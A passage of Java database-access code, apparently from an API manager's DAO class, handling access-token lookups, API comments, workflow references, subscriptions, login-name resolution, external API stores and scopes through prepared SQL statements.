accessTokenStoreTable = APIUtil.getAccessTokenStoreTableFromAccessToken(accessToken); StringBuilder authorizedDomains = new StringBuilder(); String getCKFromTokenSQL = "SELECT CONSUMER_KEY " + " FROM " + accessTokenStoreTable + " WHERE ACCESS_TOKEN = ? 
"; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getCKFromTokenSQL); prepStmt.setString(1, APIUtil.encryptToken(accessToken)); rs = prepStmt.executeQuery(); boolean first = true; while (rs.next()) { String domain = rs.getString(1); if (first) { authorizedDomains.append(domain); first = false; } else { authorizedDomains.append(',').append(domain); } } } catch (SQLException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } catch (CryptoException e) { throw new APIManagementException("Error in retrieving access allowing domain list from table.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return authorizedDomains.toString(); } return null; } public String findConsumerKeyFromAccessToken(String accessToken) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); Connection connection = null; PreparedStatement smt = null; ResultSet rs = null; String consumerKey = null; try { String getConsumerKeySql = SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants.GET_CONSUMER_KEY_BY_ACCESS_TOKEN_SUFFIX; connection = APIMgtDBUtil.getConnection(); smt = connection.prepareStatement(getConsumerKeySql); smt.setString(1, APIUtil.encryptToken(accessToken)); rs = smt.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } } catch (SQLException e) { handleException("Error while getting authorized domians.", e); } catch (CryptoException e) { handleException("Error while getting authorized domians.", e); } finally { APIMgtDBUtil.closeAllConnections(smt, connection, rs); } return consumerKey; } /** * Adds a comment for an API * * @param identifier API Identifier * @param commentText Commented Text * @param user User who did the comment * @return Comment ID */ public int addComment(APIIdentifier identifier, String commentText, String user) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; ResultSet insertSet = null; PreparedStatement getPrepStmt = null; PreparedStatement insertPrepStmt = null; int commentId = -1; int apiId = -1; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; getPrepStmt = connection.prepareStatement(getApiQuery); getPrepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); getPrepStmt.setString(2, identifier.getApiName()); getPrepStmt.setString(3, identifier.getVersion()); resultSet = getPrepStmt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } /*This query to update the AM_API_COMMENTS table */ String addCommentQuery = SQLConstants.ADD_COMMENT_SQL; /*Adding data to the AM_API_COMMENTS table*/ String dbProductName = connection.getMetaData().getDatabaseProductName(); insertPrepStmt = connection.prepareStatement(addCommentQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "comment_id")}); insertPrepStmt.setString(1, commentText); insertPrepStmt.setString(2, user); insertPrepStmt.setTimestamp(3, new Timestamp(System.currentTimeMillis()), 
Calendar.getInstance()); insertPrepStmt.setInt(4, apiId); insertPrepStmt.executeUpdate(); insertSet = insertPrepStmt.getGeneratedKeys(); while (insertSet.next()) { commentId = Integer.parseInt(insertSet.getString(1)); } connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add comment ", e1); } } handleException("Failed to add comment data, for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(getPrepStmt, connection, resultSet); APIMgtDBUtil.closeAllConnections(insertPrepStmt, null, insertSet); } return commentId; } /** * Returns all the Comments on an API * * @param identifier API Identifier * @return Comment Array * @throws APIManagementException */ public Comment[] getComments(APIIdentifier identifier) throws APIManagementException { List<Comment> commentList = new ArrayList<Comment>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sqlQuery = SQLConstants.GET_COMMENTS_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { Comment comment = new Comment(); comment.setText(resultSet.getString("COMMENT_TEXT")); comment.setUser(resultSet.getString("COMMENTED_USER")); comment.setCreatedTime(new java.util.Date(resultSet.getTimestamp("DATE_COMMENTED").getTime())); commentList.add(comment); } } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { log.error("Failed to retrieve comments ", e1); } handleException("Failed to retrieve comments for " + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return commentList.toArray(new Comment[commentList.size()]); } public boolean isContextExist(String context) { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_API_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, context); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { if (resultSet.getString(1) != null) { return true; } } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public String getAPIContext(APIIdentifier identifier) throws APIManagementException { Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String context = null; String sql = SQLConstants.GET_API_CONTEXT_BY_API_NAME_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt.setString(2, identifier.getApiName()); prepStmt.setString(3, identifier.getVersion()); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { context = resultSet.getString(1); } } catch (SQLException e) { log.error("Failed to retrieve the API Context", e); handleException("Failed to retrieve the API Context for " + 
identifier.getProviderName() + '-' + identifier.getApiName() + '-' + identifier .getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return context; } public List<String> getAllAvailableContexts() { List<String> contexts = new ArrayList<String>(); Connection connection = null; ResultSet resultSet = null; PreparedStatement prepStmt = null; String sql = SQLConstants.GET_ALL_CONTEXT_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sql); resultSet = prepStmt.executeQuery(); while (resultSet.next()) { contexts.add(resultSet.getString("CONTEXT")); } } catch (SQLException e) { log.error("Failed to retrieve the API Context ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return contexts; } public void populateAppRegistrationWorkflowDTO(ApplicationRegistrationWorkflowDTO workflowDTO) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; Application application = null; Subscriber subscriber = null; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ENTRY_BY_SUBSCRIBER_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowDTO.getExternalWorkflowReference()); rs = ps.executeQuery(); while (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setApplicationWorkFlowStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setTier(rs.getString("APPLICATION_TIER")); workflowDTO.setApplication(application); workflowDTO.setKeyType(rs.getString("TOKEN_TYPE")); workflowDTO.setUserName(subscriber.getName()); workflowDTO.setDomainList(rs.getString("ALLOWED_DOMAINS")); workflowDTO.setValidityTime(rs.getLong("VALIDITY_PERIOD")); OAuthAppRequest request = ApplicationUtils.createOauthAppRequest(application.getName(), null, application.getCallbackUrl(), rs .getString("TOKEN_SCOPE"), rs.getString("INPUTS"), application.getTokenType()); workflowDTO.setAppInfoDTO(request); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public int getApplicationIdForAppRegistration(String workflowReference) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int appId = -1; String registrationEntry = SQLConstants.GET_APPLICATION_REGISTRATION_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(registrationEntry); ps.setString(1, workflowReference); rs = ps.executeQuery(); while (rs.next()) { appId = rs.getInt("APP_ID"); } } catch (SQLException e) { handleException("Error occurred while retrieving an " + "Application Registration Entry for Workflow : " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return appId; } /** * Fetches WorkflowReference when given Application Name and UserId. 
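* Returns null when no matching workflow entry exists for the given application name and user.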
* * @param applicationName * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReference(String applicationName, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationName + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Fetches WorkflowReference when given Application ID and UserId. * * @param applicationId * @param userId * @return WorkflowReference * @throws APIManagementException */ public String getWorkflowReferenceByApplicationId(int applicationId, String userId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String workflowReference = null; String sqlQuery = SQLConstants.GET_WORKFLOW_ENTRY_BY_APP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, userId); rs = ps.executeQuery(); while (rs.next()) { workflowReference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application : " + applicationId + " created by " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowReference; } /** * Retrieves the WorkflowExternalReference for an application.
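* The entry looked up is the one recorded under the application creation workflow type (WF_TYPE_AM_APPLICATION_CREATION).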
* * @param appID ID of the application * @return External workflow reference for the application identified * @throws APIManagementException */ public String getExternalWorkflowReferenceByApplicationID(int appID) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, WorkflowConstants.WF_TYPE_AM_APPLICATION_CREATION); ps.setString(2, String.valueOf(appID)); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Application ID : " + appID, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Remove workflow entry * * @param workflowReference * @param workflowType * @throws APIManagementException */ public void removeWorkflowEntry(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String queryWorkflowDelete = SQLConstants.REMOVE_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(queryWorkflowDelete); prepStmt.setString(1, workflowType); prepStmt.setString(2, workflowReference); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting workflow entry " + workflowReference + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retries the WorkflowExternalReference for a subscription. * * @param identifier APIIdentifier to find the subscribed api * @param appID ID of the application which has the subscription * @return External workflow reference for the subscription identified * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(APIIdentifier identifier, int appID) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; int apiID; int subscriptionID = -1; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_SQL; String postgreSQL = SQLConstants.GET_EXTERNAL_WORKFLOW_REFERENCE_FOR_SUBSCRIPTION_POSTGRE_SQL; try { apiID = getAPIID(identifier, conn); conn = APIMgtDBUtil.getConnection(); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { sqlQuery = postgreSQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiID); ps.setInt(2, appID); ps.setString(3, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionID, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for a subscription. 
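* Returns null when no subscription creation workflow entry exists for the given subscription id.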
* * @param subscriptionId ID of the subscription * @return External workflow reference for the subscription <code>subscriptionId</code> * @throws APIManagementException */ public String getExternalWorkflowReferenceForSubscription(int subscriptionId) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SUBSCRIPTION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); // setting subscriptionId as string to prevent error when db finds string type IDs for // ApplicationRegistration workflows ps.setString(1, String.valueOf(subscriptionId)); ps.setString(2, WorkflowConstants.WF_TYPE_AM_SUBSCRIPTION_CREATION); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "Subscription : " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retries the WorkflowExternalReference for an user signup by DOMAIN/username. * * @param usernameWithDomain username of the signed up user inthe format of DOMAIN/username * @return External workflow reference for the signup workflow entry * @throws APIManagementException */ public String getExternalWorkflowReferenceForUserSignup(String usernameWithDomain) throws APIManagementException { String workflowExtRef = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_EXTERNAL_WORKFLOW_FOR_SIGNUP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, usernameWithDomain); ps.setString(2, WorkflowConstants.WF_TYPE_AM_USER_SIGNUP); rs = ps.executeQuery(); // returns only one row while (rs.next()) { workflowExtRef = rs.getString("WF_EXTERNAL_REFERENCE"); } } catch (SQLException e) { handleException("Error occurred while getting workflow entry for " + "User signup : " + usernameWithDomain, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return workflowExtRef; } /** * Retrieves IDs of pending subscriptions for a given application * * @param applicationId application id of the application * @return Set containing subscription id list * @throws APIManagementException */ public Set<Integer> getPendingSubscriptionsByApplicationId(int applicationId) throws APIManagementException { Set<Integer> pendingSubscriptions = new HashSet<Integer>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIPTIONS_BY_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, APIConstants.SubscriptionStatus.ON_HOLD); rs = ps.executeQuery(); while (rs.next()) { pendingSubscriptions.add(rs.getInt("SUBSCRIPTION_ID")); } } catch (SQLException e) { handleException("Error occurred while getting subscription entries for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return pendingSubscriptions; } /** * Retrieves registration workflow reference for applicationId and key type * * @param applicationId id of the application with registration * @param keyType key type of the registration * @return workflow reference of the registration * @throws APIManagementException */ public String 
getRegistrationWFReference(int applicationId, String keyType) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String reference = null; String sqlQuery = SQLConstants.GET_REGISTRATION_WORKFLOW_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setString(2, keyType); rs = ps.executeQuery(); // returns only one row while (rs.next()) { reference = rs.getString("WF_REF"); } } catch (SQLException e) { handleException("Error occurred while getting registration entry for " + "Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return reference; } /** * Retrives subscription status for APIIdentifier and applicationId * * @param identifier api identifier subscribed * @param applicationId application with subscription * @return subscription status * @throws APIManagementException */ public String getSubscriptionStatus(APIIdentifier identifier, int applicationId) throws APIManagementException { String status = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_SQL; try { conn = APIMgtDBUtil.getConnection(); int apiId = getAPIID(identifier, conn); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUB_STATUS"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return status; } /** * Retrieve subscription create state for APIIdentifier and applicationID * * @param identifier - api identifier which is subscribed * @param applicationId - application used to subscribed * @param connection * @return subscription create status * @throws APIManagementException */ public String getSubscriptionCreaeteStatus(APIIdentifier identifier, int applicationId, Connection connection) throws APIManagementException { String status = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_CREATION_STATUS_SQL; try { int apiId = getAPIID(identifier, connection); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); rs = ps.executeQuery(); // returns only one row while (rs.next()) { status = rs.getString("SUBS_CREATE_STATE"); } } catch (SQLException e) { handleException("Error occurred while getting subscription entry for " + "Application : " + applicationId + ", API: " + identifier, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return status; } private class SubscriptionInfo { private int subscriptionId; private String tierId; private int applicationId; private String accessToken; private String tokenType; } /** * Identify whether the loggedin user used his ordinal username or email * * @param userId * @return */ private boolean isUserLoggedInEmail(String userId) { return userId.contains("@"); } /** * Identify whether the loggedin user used his Primary Login name or Secondary login name * * @param userId * @return */ private boolean isSecondaryLogin(String userId) { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); if 
(loginConfiguration.get(APIConstants.EMAIL_LOGIN) != null) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); if ("true".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(emailConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } } if (loginConfiguration.get(APIConstants.USERID_LOGIN) != null) { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); if ("true".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return isUserLoggedInEmail(userId); } if ("false".equalsIgnoreCase(userIdConf.get(APIConstants.PRIMARY_LOGIN))) { return !isUserLoggedInEmail(userId); } } return false; } /** * Get the primaryLogin name using secondary login name. Primary secondary * Configuration is provided in the identitiy.xml. In the userstore, it is * users responsibility TO MAINTAIN THE SECONDARY LOGIN NAME AS UNIQUE for * each and every users. If it is not unique, we will pick the very first * entry from the userlist. * * @param login * @return * @throws APIManagementException */ private String getPrimaryLoginFromSecondary(String login) throws APIManagementException { Map<String, Map<String, String>> loginConfiguration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration().getLoginConfiguration(); String claimURI, username = null; if (isUserLoggedInEmail(login)) { Map<String, String> emailConf = loginConfiguration.get(APIConstants.EMAIL_LOGIN); claimURI = emailConf.get(APIConstants.CLAIM_URI); } else { Map<String, String> userIdConf = loginConfiguration.get(APIConstants.USERID_LOGIN); claimURI = userIdConf.get(APIConstants.CLAIM_URI); } try { RemoteUserManagerClient rmUserClient = new RemoteUserManagerClient(login); String[] user = rmUserClient.getUserList(claimURI, login); if (user.length > 0) { username = user[0]; } } catch (Exception e) { handleException("Error while retrieving the primaryLogin name using secondary loginName : " + login, e); } return username; } /** * identify the login username is primary or secondary * * @param userID * @return * @throws APIManagementException */ private String getLoginUserName(String userID) throws APIManagementException { String primaryLogin = userID; if (isSecondaryLogin(userID)) { primaryLogin = getPrimaryLoginFromSecondary(userID); } return primaryLogin; } /** * Store external APIStore details to which APIs successfully published * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean addExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.ADD_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getDisplayName()); ps.setString(4, store.getEndpoint()); ps.setString(5, store.getType()); ps.addBatch(); } ps.executeBatch(); 
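// All external store rows were added to a single batch above; commit only after the whole batch succeeds (the catch block below rolls back on failure).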
conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback storing external apistore details ", e1); } } log.error("Failed to store external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to store external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } /** * Delete the records of external APIStore details. * * @param apiId APIIdentifier * @param apiStoreSet APIStores set * @return added/failed * @throws APIManagementException */ public boolean deleteExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; boolean state = false; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_EXTERNAL_API_STORE_SQL; //Get API Id int apiIdentifier; apiIdentifier = getAPIID(apiId, conn); if (apiIdentifier == -1) { String msg = "Could not load API record for: " + apiId.getApiName(); log.error(msg); } ps = conn.prepareStatement(sqlQuery); for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setInt(1, apiIdentifier); ps.setString(2, store.getName()); ps.setString(3, store.getType()); ps.addBatch(); } ps.executeBatch(); conn.commit(); state = true; } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback deleting external apistore details ", e1); } } log.error("Failed to delete external apistore details", e); state = false; } catch (APIManagementException e) { log.error("Failed to delete external apistore details", e); state = false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } return state; } public void updateExternalAPIStoresDetails(APIIdentifier apiId, Set<APIStore> apiStoreSet) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); updateExternalAPIStoresDetails(apiId, apiStoreSet, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback updating external apistore details ", e1); } } log.error("Failed to update external apistore details", e); } catch (APIManagementException e) { log.error("Failed to updating external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * Updateexternal APIStores details to which APIs published * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to add Application */ public void updateExternalAPIStoresDetails(APIIdentifier apiIdentifier, Set<APIStore> apiStoreSet, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; try { conn.setAutoCommit(false); //This query to add external APIStores to database table String sqlQuery = SQLConstants.UPDATE_EXTERNAL_API_STORE_SQL; ps = conn.prepareStatement(sqlQuery); //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); } for (Object storeObject : apiStoreSet) { APIStore store = (APIStore) storeObject; ps.setString(1, store.getEndpoint()); ps.setString(2, store.getType()); ps.setInt(3, apiId); ps.setString(4, store.getName()); ps.addBatch(); } ps.executeBatch(); 
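// One UPDATE per external store was batched above; executeBatch flushes them together before the batch is cleared and the caller-supplied connection is committed.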
ps.clearBatch(); conn.commit(); } catch (SQLException e) { log.error("Error while updating External APIStore details to the database for API : ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Return external APIStore details on successfully APIs published * * @param apiId APIIdentifier * @return Set of APIStore * @throws APIManagementException */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiId) throws APIManagementException { Connection conn = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); storesSet = getExternalAPIStoresDetails(apiId, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting external apistore details ", e1); } } log.error("Failed to get external apistore details", e); } catch (APIManagementException e) { log.error("Failed to get external apistore details", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return storesSet; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); //This query to add external APIStores to database table String sqlQuery = SQLConstants.GET_EXTERNAL_API_STORE_DETAILS_SQL; ps = conn.prepareStatement(sqlQuery); int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { APIStore store = new APIStore(); store.setName(rs.getString("STORE_ID")); store.setDisplayName(rs.getString("STORE_DISPLAY_NAME")); store.setEndpoint(rs.getString("STORE_ENDPOINT")); store.setType(rs.getString("STORE_TYPE")); store.setPublished(true); storesSet.add(store); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return storesSet; } public void addScopes(Set<?> objects, APIIdentifier apiIdentifier, int apiID, int tenantID) throws APIManagementException { Connection conn = null; PreparedStatement ps = null, ps2 = null, ps3 = null; ResultSet rs = null; String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String scopeRoleEntry = SQLConstants.ADD_SCOPE_ROLE_SQL; String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; Boolean scopeSharingEnabled = false; if (!StringUtils.isEmpty(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING))) { scopeSharingEnabled = Boolean.parseBoolean(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING)); } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); ps2 = conn.prepareStatement(scopeLink); ps3 = 
conn.prepareStatement(scopeRoleEntry); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, uriTemplate.getScope().getKey(), tenantID)) { throw new APIManagementException("Scope '" + uriTemplate.getScope().getKey() + "' " + "is already used by another API."); } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { uriTemplate.getScope().setId(rs.getInt(1)); } String roles = uriTemplate.getScope().getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, uriTemplate.getScope().getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, uriTemplate.getScope().getId()); ps2.execute(); conn.commit(); } else if (object instanceof Scope) { Scope scope = (Scope) object; if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, scope.getKey(), tenantID)) { throw new APIManagementException("Scope '" + scope.getKey() + "' is already used " + "by another API."); } ps.setString(1, scope.getKey()); ps.setString(2, 